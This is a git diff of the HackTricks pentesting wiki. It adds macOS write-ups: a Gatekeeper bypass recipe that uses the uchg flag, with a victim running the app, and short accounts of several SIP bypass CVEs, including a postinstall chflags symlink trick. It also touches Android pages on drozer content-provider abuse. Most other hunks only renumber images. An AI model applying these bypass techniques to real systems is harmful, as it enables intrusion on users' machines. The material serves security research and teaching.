 It's possible to **check if an App will be allowed by GateKeeper** with:
 
@@ -184,6 +183,8 @@ This attribute must be **set by the application creating/downloading** the file.
 However, files that are sandboxed will have this attribute set to every file they create. And non sandboxed apps can set it themselves, or specify the [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information\_property\_list/lsfilequarantineenabled?language=objc) key in the **Info.plist** which will make the system set the `com.apple.quarantine` extended attribute on the files created,
 {% endhint %}
 
+Moreover, all files created by a process calling **`qtn_proc_apply_to_self`** are quarantined. Or the API **`qtn_file_apply_to_path`** adds the quarantine attribute to a specified file path.
+
 It's possible to **check it's status and enable/disable** (root required) with:
 
 ```bash
@@ -460,15 +461,23 @@ echo "[+] compressing files"
 aa archive -d s/ -o app.aar
 ```
 
+### uchg (from this [talk](https://codeblue.jp/2023/result/pdf/cb23-bypassing-macos-security-and-privacy-mechanisms-from-gatekeeper-to-system-integrity-protection-by-koh-nakagawa.pdf))
+
+* Create a directory containing an app.
+* Add uchg to the app.
+* Compress the app to a tar.gz file.
+* Send the tar.gz file to a victim.
+* The victim opens the tar.gz file and runs the app.
+* Gatekeeper does not check the app.
+
 ### Prevent Quarantine xattr
 
 In an ".app" bundle if the quarantine xattr is not added to it, when executing it **Gatekeeper won't be triggered**.
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
index 6a3404c67..b3d175536 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ## Sandbox loading process
 
-<figure><img src="../../../../../.gitbook/assets/image (898).png" alt=""><figcaption><p>Image from <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (901).png" alt=""><figcaption><p>Image from <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
 
 In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
index adfde83e1..814f5fb8c 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## **Basic Information**
 
@@ -79,7 +79,7 @@ Moreover, if a file contains the attribute **`com.apple.rootless`** extended **a
 
 Options are maintained in nvram variable as a bitflag (`csr-active-config` on Intel and `lp-sip0` is read from the booted Device Tree for ARM). You can find the flags in the XNU source code in `csr.sh`:
 
-<figure><img src="../../../.gitbook/assets/image (1189).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1192).png" alt=""><figcaption></figcaption></figure>
 
 ### SIP Status
 
@@ -132,7 +132,15 @@ One potential loophole is that if a file is specified in **`rootless.conf` but d
 The entitlement **`com.apple.rootless.install.heritable`** allows to bypass SIP
 {% endhint %}
 
-#### Shrootless
+#### [CVE-2019-8561](https://objective-see.org/blog/blog\_0x42.html) <a href="#cve" id="cve"></a>
+
+It was discovered that it was possible to **swap the installer package after the system verified its code** signature and then, the system would install the malicious package instead of the original. As these actions were performed by **`system_installd`**, it would allow to bypass SIP.
+
+#### [CVE-2020–9854](https://objective-see.org/blog/blog\_0x4D.html) <a href="#cve-unauthd-chain" id="cve-unauthd-chain"></a>
+
+If a package was installed from a mounted image or external drive the **installer** would **execute** the binary from **that file system** (instead from a SIP protected location), making **`system_installd`** execute an arbitrary binary.
+
+#### CVE-2021-30892 - Shrootless
 
 [**Researchers from this blog post**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) discovered a vulnerability in macOS's System Integrity Protection (SIP) mechanism, dubbed the 'Shrootless' vulnerability. This vulnerability centers around the **`system_installd`** daemon, which has an entitlement, **`com.apple.rootless.install.heritable`**, that allows any of its child processes to bypass SIP's file system restrictions.
 
@@ -190,6 +198,16 @@ Moreover, within the `InstallESD.dmg`, there's a `BaseSystem.dmg`, which serves
 
 In this talk from [**DEF CON 31**](https://www.youtube.com/watch?v=zxZesAN-TEk), it's shown how **`systemmigrationd`** (which can bypass SIP) executes a **bash** and a **perl** script, which can be abused via env variables **`BASH_ENV`** and **`PERL5OPT`**.
 
+#### CVE-2023-42860 <a href="#cve-a-detailed-look" id="cve-a-detailed-look"></a>
+
+As [**detailed in this blog post**](https://blog.kandji.io/apple-mitigates-vulnerabilities-installer-scripts), a `postinstall` script from `InstallAssistant.pkg` packages allowed was executing:
+
+```bash
+/usr/bin/chflags -h norestricted "${SHARED_SUPPORT_PATH}/SharedSupport.dmg"
+```
+
+and it was possible to crate a symlink in `${SHARED_SUPPORT_PATH}/SharedSupport.dmg` that would allow a user to **unrestrict any file, bypassing SIP protection**.
+
 ### **com.apple.rootless.install**
 
 {% hint style="danger" %}
@@ -273,7 +291,7 @@ mount
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
index aa88c8182..3865ae998 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
@@ -412,7 +412,7 @@ Therefore, you won't be able to abuse the full FDA habilities.
 
 This is the TCC prompt to get Automation privileges over Finder:
 
-<figure><img src="../../../../.gitbook/assets/image (24).png" alt="" width="244"><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (27).png" alt="" width="244"><figcaption></figcaption></figure>
 
 {% hint style="danger" %}
 Note that because the **Automator** app has the TCC permission **`kTCCServiceAppleEvents`**, it can **control any app**, like Finder. So having the permission to control Automator you could also control the **Finder** with a code like the one below:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
index 63e9985c9..a932d9fe2 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
@@ -55,7 +55,7 @@ More info and PoC in:
 
 By default an access via **SSH used to have "Full Disk Access"**. In order to disable this you need to have it listed but disabled (removing it from the list won't remove those privileges):
 
-![](<../../../../../.gitbook/assets/image (1074).png>)
+![](<../../../../../.gitbook/assets/image (1077).png>)
 
 Here you can find examples of how some **malwares have been able to bypass this protection**:
 
@@ -91,7 +91,7 @@ For more info about Apple Scripts check:
 
 For example, if an App has **Automation permission over `iTerm`**, for example in this example **`Terminal`** has access over iTerm:
 
-<figure><img src="../../../../../.gitbook/assets/image (978).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (981).png" alt=""><figcaption></figcaption></figure>
 
 #### Over iTerm
 
@@ -170,7 +170,7 @@ $> ls ~/Documents
 
 Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file:
 
-<figure><img src="../../../../../.gitbook/assets/image (473).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (476).png" alt=""><figcaption></figcaption></figure>
 
 ### CVE-2021-30782 - Translocation
 
@@ -530,17 +530,17 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
 
 In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
 
-<figure><img src="../../../../../.gitbook/assets/image (471).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (474).png" alt=""><figcaption></figcaption></figure>
 
 ## Synthetic Clicks
 
 This doesn't work anymore, but it [**did in the past**](https://twitter.com/noarfromspace/status/639125916233416704/photo/1)**:**
 
-<figure><img src="../../../../../.gitbook/assets/image (26).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (29).png" alt=""><figcaption></figcaption></figure>
 
 Another way using [**CoreGraphics events**](https://objectivebythesea.org/v2/talks/OBTS\_v2\_Wardle.pdf):
 
-<figure><img src="../../../../../.gitbook/assets/image (27).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (30).png" alt="" width="563"><figcaption></figcaption></figure>
 
 ## Reference
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
index 834c2fb71..a792ca976 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ### Common Users
 
@@ -63,7 +63,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/macos-hardening/macos-useful-commands.md b/macos-hardening/macos-useful-commands.md
index e7da89dbb..150baa507 100644
--- a/macos-hardening/macos-useful-commands.md
+++ b/macos-hardening/macos-useful-commands.md
@@ -157,7 +157,7 @@ launchctl print gui/<user's UID>/com.company.launchagent.label
 
 Without prompts
 
-<figure><img src="../.gitbook/assets/image (76).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (79).png" alt=""><figcaption></figcaption></figure>
 
 <details>
 
diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md
index 5c7a19f51..489ca691c 100644
--- a/mobile-pentesting/android-app-pentesting/README.md
+++ b/mobile-pentesting/android-app-pentesting/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -233,7 +233,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
 
 ***
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -260,7 +260,7 @@ You can create a **free account** in: [https://appetize.io/](https://appetize.io
 
 You can even **see the logs of your application** in the web and connect through **adb**.
 
-![](<../../.gitbook/assets/image (828).png>)
+![](<../../.gitbook/assets/image (831).png>)
 
 Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emulators.
 
@@ -284,7 +284,7 @@ When creating a new emulator on any platform remember that the bigger the screen
 
 To **install google services** (like AppStore) in Genymotion you need to click on the red marked button of the following image:
 
-![](<../../.gitbook/assets/image (274).png>)
+![](<../../.gitbook/assets/image (277).png>)
 
 Also, notice that in the **configuration of the Android VM in Genymotion** you can select **Bridge Network mode** (this will be useful if you will be connecting to the Android VM from a different VM with the tools).
 
@@ -572,7 +572,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
 
 ***
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -593,7 +593,7 @@ Stay informed with the newest bug bounties launching and crucial platform update
 
 **Static analysis**
 
-![](<../../.gitbook/assets/image (863).png>)
+![](<../../.gitbook/assets/image (866).png>)
 
 **Vulnerability assessment of the application** using a nice web-based frontend. You can also perform dynamic analysis (but you need to prepare the environment).
 
@@ -626,7 +626,7 @@ MobSF can also **invoke exported activities**, grab **screenshots** of them and
 To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\
 MobSF also allows you to load your own **Frida scripts** (to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**").
 
-![](<../../.gitbook/assets/image (416).png>)
+![](<../../.gitbook/assets/image (419).png>)
 
 Moreover, you have some Auxiliary Frida functionalities:
 
@@ -676,7 +676,7 @@ This tool with use some **Hooks** to let you know **what is happening in the app
 
 This is a **great tool to perform static analysis with a GUI**
 
-![](<../../.gitbook/assets/image (738).png>)
+![](<../../.gitbook/assets/image (741).png>)
 
 ### [Qark](https://github.com/linkedin/qark)
 
@@ -716,7 +716,7 @@ super-analyzer {apk_file}
 
 ### [StaCoAn](https://github.com/vincentcox/StaCoAn)
 
-![](<../../.gitbook/assets/image (294).png>)
+![](<../../.gitbook/assets/image (297).png>)
 
 StaCoAn is a **crossplatform** tool which aids developers, bugbounty hunters and ethical hackers performing [static code analysis](https://en.wikipedia.org/wiki/Static\_program\_analysis) on mobile applications.
 
@@ -752,7 +752,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
 
 ### [MARA Framework](https://github.com/xtiankisutsa/MARA\_Framework)
 
-![](<../../.gitbook/assets/image (592).png>)
+![](<../../.gitbook/assets/image (595).png>)
 
 **MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. It is a tool that puts together commonly used mobile application reverse engineering and analysis tools, to assist in testing mobile applications against the OWASP mobile security threats. Its objective is to make this task easier and friendlier to mobile application developers and security professionals.
 
@@ -829,7 +829,7 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
 * [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
 * [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/mobile-pentesting/android-app-pentesting/android-task-hijacking.md b/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
index 76e6097f7..dfbcedcd2 100644
--- a/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
+++ b/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
@@ -33,7 +33,7 @@ Here's a quick breakdown of activity transitions:
 * Starting **Activity 3** moves **Activity 1** and **Activity 2** further back in the stack, with **Activity 3** now in front.
 * Closing **Activity 3** brings **Activity 2** back to the foreground, showcasing Android's streamlined task navigation mechanism.
 
-![https://developer.android.com/images/fundamentals/diagram\_backstack.png](<../../.gitbook/assets/image (695).png>)
+![https://developer.android.com/images/fundamentals/diagram\_backstack.png](<../../.gitbook/assets/image (698).png>)
 
 ## Task affinity attack
 
diff --git a/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
index b2df70cf3..fcede2564 100644
--- a/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
+++ b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
@@ -48,25 +48,25 @@ If you installed Android Studio, you can just open the main project view and acc
 
 <div align="center" data-full-width="false">
 
-<figure><img src="../../.gitbook/assets/image (1139).png" alt="" width="293"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1142).png" alt="" width="293"><figcaption></figcaption></figure>
 
 </div>
 
 Then, click on _**Create Virtual Device**_
 
-<figure><img src="../../.gitbook/assets/image (1140).png" alt="" width="188"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1143).png" alt="" width="188"><figcaption></figcaption></figure>
 
 _**select** the phone you want to use_ and click on _**Next.**_
 
 {% hint style="warning" %}
 If you need a phone with Play Store installed select one with the Play Store icon on it!
 
-<img src="../../.gitbook/assets/image (1141).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1144).png" alt="" data-size="original">
 {% endhint %}
 
 In the current view you are going to be able to **select and download the Android image** that the phone is going to run:
 
-<figure><img src="../../.gitbook/assets/image (1142).png" alt="" width="375"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1145).png" alt="" width="375"><figcaption></figcaption></figure>
 
 So, select it and if it isn't downloaded click on the _**Download**_ symbol next to the name (**now wait until the image is downloaded).**\
 Once the image is downloaded, just select **`Next`** and **`Finish`**.
@@ -77,7 +77,7 @@ The virtual machine will be created. Now **every time that you access AVD manage
 
 In order to **run** it just press the _**Start button**_.
 
-![](<../../.gitbook/assets/image (515).png>)
+![](<../../.gitbook/assets/image (518).png>)
 
 ## Command Line tool
 
@@ -246,7 +246,7 @@ Check the following page to learn how to install a custom CA cert:
 
 You can **use the GUI** to take a snapshot of the VM at any time:
 
-![](<../../.gitbook/assets/image (231).png>)
+![](<../../.gitbook/assets/image (234).png>)
 
 <details>
 
diff --git a/mobile-pentesting/android-app-pentesting/content-protocol.md b/mobile-pentesting/android-app-pentesting/content-protocol.md
index ea2849016..e1c555116 100644
--- a/mobile-pentesting/android-app-pentesting/content-protocol.md
+++ b/mobile-pentesting/android-app-pentesting/content-protocol.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -97,7 +97,7 @@ Proof-of-Concept HTML:
 </html>
 ```
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md b/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
index 7062d8bc0..e7b0be474 100644
--- a/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
+++ b/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
@@ -53,7 +53,7 @@ adb forward tcp:31415 tcp:31415
 
 Finally, **launch** the **application** and press the bottom "**ON**"
 
-![](<../../../.gitbook/assets/image (456).png>)
+![](<../../../.gitbook/assets/image (459).png>)
 
 And connect to it:
 
@@ -186,7 +186,7 @@ A exported service is declared inside the Manifest.xml:
 
 Inside the code **check** for the \*\*`handleMessage`\*\*function which will **receive** the **message**:
 
-![](<../../../.gitbook/assets/image (79).png>)
+![](<../../../.gitbook/assets/image (82).png>)
 
 #### List service
 
@@ -211,7 +211,7 @@ app.service.stop            Stop Service
 
 Take a look to the **drozer** help for `app.service.send`:
 
-![](<../../../.gitbook/assets/image (1076).png>)
+![](<../../../.gitbook/assets/image (1079).png>)
 
 Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.\
 Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details.
@@ -227,7 +227,7 @@ In the following example:
 run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj
 ```
 
-![](<../../../.gitbook/assets/image (644).png>)
+![](<../../../.gitbook/assets/image (647).png>)
 
 ### Broadcast Receivers
 
@@ -276,9 +276,9 @@ app.broadcast.sniff         Register a broadcast receiver that can sniff particu
 
 In this example abusing the [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider you can **send an arbitrary SMS** any non-premium destination **without asking** the user for permission.
 
-![](<../../../.gitbook/assets/image (412).png>)
+![](<../../../.gitbook/assets/image (415).png>)
 
-![](<../../../.gitbook/assets/image (570).png>)
+![](<../../../.gitbook/assets/image (573).png>)
 
 If you read the code, the parameters "_phoneNumber_" and "_message_" must be sent to the Content Provider.
 
diff --git a/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
index 2ce104b61..9d3146102 100644
--- a/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
+++ b/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
@@ -78,7 +78,7 @@ You should also check the **ContentProvider code** to search for queries:
 
 Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
 
-![](<../../../.gitbook/assets/image (561).png>)
+![](<../../../.gitbook/assets/image (564).png>)
 
 The query will be like: `content://name.of.package.class/declared_name`
 
@@ -89,7 +89,7 @@ Check if you can **access sensitive information** or try to change it to **bypas
 
 When checking the code of the Content Provider **look** also for **functions** named like: _query, insert, update and delete_:
 
-![](<../../../.gitbook/assets/image (884).png>)
+![](<../../../.gitbook/assets/image (887).png>)
 
 ![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
 
@@ -111,9 +111,9 @@ email: incognitoguy50@gmail.com
 
 Quering the database you will learn the **name of the columns**, then, you could be able to insert data in the DB:
 
-![](<../../../.gitbook/assets/image (95).png>)
+![](<../../../.gitbook/assets/image (98).png>)
 
-![](<../../../.gitbook/assets/image (170).png>)
+![](<../../../.gitbook/assets/image (173).png>)
 
 _Note that in insert and update you can use --string to indicate string, --double to indicate a double, --float, --integer, --long, --short, --boolean_
 
@@ -121,18 +121,18 @@ _Note that in insert and update you can use --string to indicate string, --doubl
 
 Knowing the name of the columns you could also **modify the entries**:
 
-![](<../../../.gitbook/assets/image (777).png>)
+![](<../../../.gitbook/assets/image (780).png>)
 
 ### Delete content
 
-![](<../../../.gitbook/assets/image (420).png>)
+![](<../../../.gitbook/assets/image (423).png>)
 
 ### **SQL Injection**
 
 It is simple to test for SQL injection **(SQLite)** by manipulating the **projection** and **selection fields** that are passed to the content provider.\
 When quering the Content Provider there are 2 interesting arguments to search for information: _--selection_ and _--projection_:
 
-![](<../../../.gitbook/assets/image (781).png>)
+![](<../../../.gitbook/assets/image (784).png>)
 
 You can try to **abuse** this **parameters** to test for **SQL injections**:
 
@@ -175,7 +175,7 @@ Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/not
 
 Content providers could be also used to **access files:**
 
-![](<../../../.gitbook/assets/image (404).png>)
+![](<../../../.gitbook/assets/image (407).png>)
 
 ### Read **file**
 
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
index 0d14dfdd0..c66cee0f4 100644
--- a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
+++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
@@ -69,7 +69,7 @@ Some interesting information (like passwords or paths) could be find inside the
 env
 ```
 
-![](<../../../.gitbook/assets/image (217).png>)
+![](<../../../.gitbook/assets/image (220).png>)
 
 #### Frida Information
 
@@ -77,7 +77,7 @@ env
 frida
 ```
 
-![](<../../../.gitbook/assets/image (1090).png>)
+![](<../../../.gitbook/assets/image (1093).png>)
 
 #### Upload/Download
 
@@ -130,7 +130,7 @@ This is also usefull if somehow you are **unable to get some readable source cod
 android hooking list activities
 ```
 
-![](<../../../.gitbook/assets/image (1013).png>)
+![](<../../../.gitbook/assets/image (1016).png>)
 
 ```bash
 android hooking list services
@@ -145,7 +145,7 @@ Frida will launch an error if none is found
 android hooking get current_activity
 ```
 
-![](<../../../.gitbook/assets/image (810).png>)
+![](<../../../.gitbook/assets/image (813).png>)
 
 #### Search Classes
 
@@ -155,7 +155,7 @@ Lets start looking for classes inside our application
 android hooking search classes asvid.github.io.fridaapp
 ```
 
-![](<../../../.gitbook/assets/image (504).png>)
+![](<../../../.gitbook/assets/image (507).png>)
 
 #### Search Methods of a class
 
@@ -165,7 +165,7 @@ Now lets extract the methods inside the class _MainActivity:_
 android hooking search methods asvid.github.io.fridaapp MainActivity
 ```
 
-![](<../../../.gitbook/assets/image (926).png>)
+![](<../../../.gitbook/assets/image (929).png>)
 
 #### List declared Methods of a class with their parameters
 
@@ -175,7 +175,7 @@ Lets figure out wich parameters does the methods of the class need:
 android hooking list class_methods asvid.github.io.fridaapp.MainActivity
 ```
 
-![](<../../../.gitbook/assets/image (296).png>)
+![](<../../../.gitbook/assets/image (299).png>)
 
 #### List classes
 
@@ -197,7 +197,7 @@ From the [source code](https://github.com/asvid/FridaApp/blob/master/app/src/mai
 android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --dump-args --dump-backtrace --dump-return
 ```
 
-![](<../../../.gitbook/assets/image (1083).png>)
+![](<../../../.gitbook/assets/image (1086).png>)
 
